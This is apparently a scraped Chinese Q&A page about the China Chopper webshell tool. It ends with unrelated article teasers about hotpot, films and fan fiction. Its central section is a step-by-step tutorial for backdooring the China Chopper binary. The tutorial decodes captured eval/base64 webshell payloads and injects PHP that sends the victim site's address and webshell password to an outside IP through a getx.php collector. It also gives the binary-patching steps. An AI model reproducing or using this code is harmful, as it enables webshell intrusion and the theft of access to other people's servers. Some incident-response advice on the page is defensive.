中国菜刀黑客(菜刀黑客攻击)

hacker3年前关于黑客接单109
本文导读目录:

中国菜刀是什么软件

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。

只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中国菜刀来进行管理!

常用功能:

文件管理,虚拟终端,数据库管理。

其它功能:

WEB浏览器(POST浏览/自定义COOKIE浏览/自定义 *** )

网站爬行(自动保存目录结构)

网站安全扫描。

在非简体中文环境下使用,自动切换到英文界面。

魔高一尺,道高一丈,黑客攻击别人时也会有被别人攻击的一天吧?

比如之前那个中国菜刀吧、大家都没发现他有后门、而每一个玩web渗透的基本都用过。等于说你拿一份shell他也拿了一份。但他也会被反过来检测到是谁做的后门。

为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式

您好,电脑基础专业芝麻团队奶沫为您解答!(望采纳,谢谢)

中国菜刀是黑客用的吧?

如何给中国菜刀添加隐蔽后门

1、后门如何触发

这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。

当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图

当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。

2、菜刀脱壳

在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。

3、查看数据包,分析流程(右键-编辑)

本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,

数据如下

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D

一共有3个参数,

a url解码后为@eval (base64_decode($_POST[z0]));

z0先url解码,在base64解码为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();

Z1先url解码,在base64解码为

C:\\wamp\\www\\robots.txt

稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。

4、使用OD分析

使用OD打开中国菜刀,右键搜索字符串,结果如下:

定位到php读取文的字符串处,点击进去到代码处

可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。

5、修改菜刀程序文件

由上可知,字符串的地址为0x49ba94,查看内存数据,

发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。

这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。

将后门字符串

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

放到文件841d0处

打开010editor 将上述字符串复制到010editor中,

由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换

使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,

保存文件,这样后门字符串就被我们添加到程序中了。

6、使用OD修改程序代码

用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。

0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下

保存修改的文件即可。

7、测试修改结果

修改文件后,我们在看看菜刀-右键编辑,抓到数据包

Z0解密后为

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();

可见我们的后门代码也一起被发送到服务端执行了。

编写加单的getx.php接收结果,

getx.php:

?php

$getx = $_GET["caidao"];

$file = fopen("getx.txt","a+");

fwrite($file,$getx);

fwrite($file,"\r\n");

fclose($file);

?

结果如下:

8、后记

通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。

中国黑客界的东南西北中都是有谁?

这个不知道,桂林老兵,冰狐浪子,葛军,NEW4等等,至于是不是你说的东南西北中,你查一下他们的位置就知道了,我估计桂林老兵大概是西吧,他最新的作品:中国菜刀,相当强悍

当公司里 Linux 系统被入侵了,应该怎么办

也说两句,因为自己有服务器,自己维护,也曾经被一个三流小屁孩用“中国菜刀”给杀进来了,之后对注入,一句话木马了解了一下,说说我的看法。

一般来说系统层面的入侵机率比较低,本身服务器系统是挺安全的,不管是windows还是Linux或Unix,真正能从系统层入侵的牛人其实不多的。就像去年暴出的open ssl漏洞,其实真正实施地来难度不小,而且入侵之后能得到什么有价值的数据也未必。

在中国网上有挺多收费学习所谓的“黑客技术”的机构,充其量就是傻瓜式的破坏者,花钱别人卖套工具给你,教会你怎么用怎么看数据,然后就是开着机器不断的扫IP/域名/扫漏洞,扫到了就进一步傻瓜式的破坏或为所欲为。

就以“中国菜刀”来说,一句话木马或注入测试比较多,进系统以后win可以上传asp,php网页工具,能做的事就多了(看了你会吃一惊),包括可以在网页运行cmd命令,知道这是啥吧。Linux有难度,因为权限相当严格,可能跨一级目录连读写权限都没有了。所以侵入Linux能破坏,想不到有什么其它好处,除非这个管理员水平真的太差了。

在Linux下运行shell脚本都是需要权限的,要运行exe程序如果没有wine和同类软件那是不可能的,那为什么Linux还要装杀毒软件,其实是杀上传文件的毒,并不是为Linux服务器杀毒,仅用于检查存储的文件安全而已。说了这么多,相信你能明白Linux服务器的弱项并非来自系统,更多可能来自于web代码或业务系统。

最后在上面的基础上来回答你的问题,做好以下几点,损失会很小,如果你什么也没做,那结果难讲了。

1,平时备份好数据,所有人都这么说,其实业务系统最重要的是数据,业务程序本身价值不大。

2,初次安装业务系统时就应该把业务系统代码备份一份,以便在重新搭建环境时能快递恢复。

3,有了以上两点,就算入侵者得到了root权限,rm -rf /也不用怕,能很快恢复业务环境,数据损失大小在于你最后一次备份。且得到root不是件容易的事,现实中很难做到这一步。

4,发现被入侵后,我的做法是马上拔网线,你技术再怎么牛B,网线一拔,电源你关,你来咬我啊?要知道电源开关的权限高于一切。

5,找原因,从上面说的一堆废话中可以看出,先不要怀疑系统,如果你跑的是电商,BBS,或带有搜索功能的web,且用的是大型开源系统,建议你先官网看看最新运态,有没有其它人一样中招,官方有没有发部补丁。有就及时更新。

6,如果是系统问题,也要及时更新补丁。但记住:web被入侵的机率远远高于系统几个数量级。

7,不管是Linux或是windows,都建议安装杀软和 *** 安全狗或知名防火墙, *** 安全狗更新更及时,效果我认为更好,对新的黑客技术的处理能力更强。

8,多余的提一下:如果是windows建议安装上还原软件,冰点(xp-win10),迅闪(2K3),很不错,只保护C盘,用于重启清除C盘被修改的地方,还原帐号,木马,病毒等。这个对Linux有点多余。被入后先重启电脑,断网再找原因。

9,Linux业务系统被入侵后,数据方面最多就是被删除或破坏不全,建议可以直接用。但业务系统的代码建议使用备份的复盖,你要知道web代码里可以插入ftp代码,工具代码,很难查出来,能干的事情又多。

其实那些Linux的服务器发行版默认设置的安全性都挺高的,多关心业务代码的安全性。至于被入侵后杀毒,我认为意义不大,入侵时杀软都没有发觉,入侵后再扫又能怎么样。还不如上面9点彻底。

相关文章

黑客在哪里找才可以下载上怎么软件-黑客免费帮忙盗微信号(找黑客帮忙

每日好文 当一个黑客怎么赚钱 往事无风险套利方法(可转债无风险套利) 国家用黑客干什么 cctv黑客菜霸采访(黑客菜霸鄢奉天) 网页被黑客篡改怎么办 能查别人电话实名制吗(电话实名制查询) 黑客能用...

农夫石锅鱼火锅这个项目怎么样?美味又健康

农夫石锅鱼火锅这个项目怎么样?美味又健康

一锅热腾腾的暖锅,足够发动空气,所以暖锅成为浩瀚人的现代饮食选择。无论是家庭会餐照旧贸易团建,一锅鲜香麻辣的暖锅足够让所有人都乐在个中。于是各式百般的特色暖锅连锁店涌现市场,在全国范畴内各处着花,甚至...

西楚霸王电影(西楚霸王电影超清下载)

尊敬的迅雷用户,您好:这个您可以到迅雷快传上进行搜索一下,快传里面分享的文件挺多的,如果找不到的话,可以到电影天堂这里进行搜索一下。迅雷快。 西楚霸王&id=16希望采纳 土豆网上可在线看要下...

全职同人黑客也玩荣耀(全职高手黑客也玩荣耀 小说)

全职同人黑客也玩荣耀(全职高手黑客也玩荣耀 小说)

本文目录一览: 1、求全职同人文,有没有苏沐秋复活或者没有死和叶修大大一起打荣耀的,要原文背景的。 2、求已完结的《全职高手》同人文,各种CP都可以,不要全都是一个CP的,也不要ALL叶或者叶AL...

怎么创建百度百科词条?教你轻松创建的方法

怎么创建百度百科词条?教你轻松创建的方法

一、开头篇 对于涉足互联网的公司想要通过网络营销来获得财富的来说,百度百科词条创建已经是必不可少的一环,也是必须占领的领地了:公司名称、商标名称等等。 【新手可做,屡试不爽!】企业词条可以尝试企业通...

柳絮其实是柳树的什么?蚂蚁庄园小鸡宝宝考考你5月27日问题答案

柳絮其实是柳树的什么?蚂蚁庄园小鸡宝宝考考你5月27日问题答案

一到春天就会看到满天飘零的柳絮,但是各位小伙伴知道春天随风飘扬的白色柳絮其实是柳树的什么吗?赶快跟随小编学习一些全新的知识,给自己的小鸡赚点饲料吧。 5月26日每日一答: 春天随风飘扬的白色柳...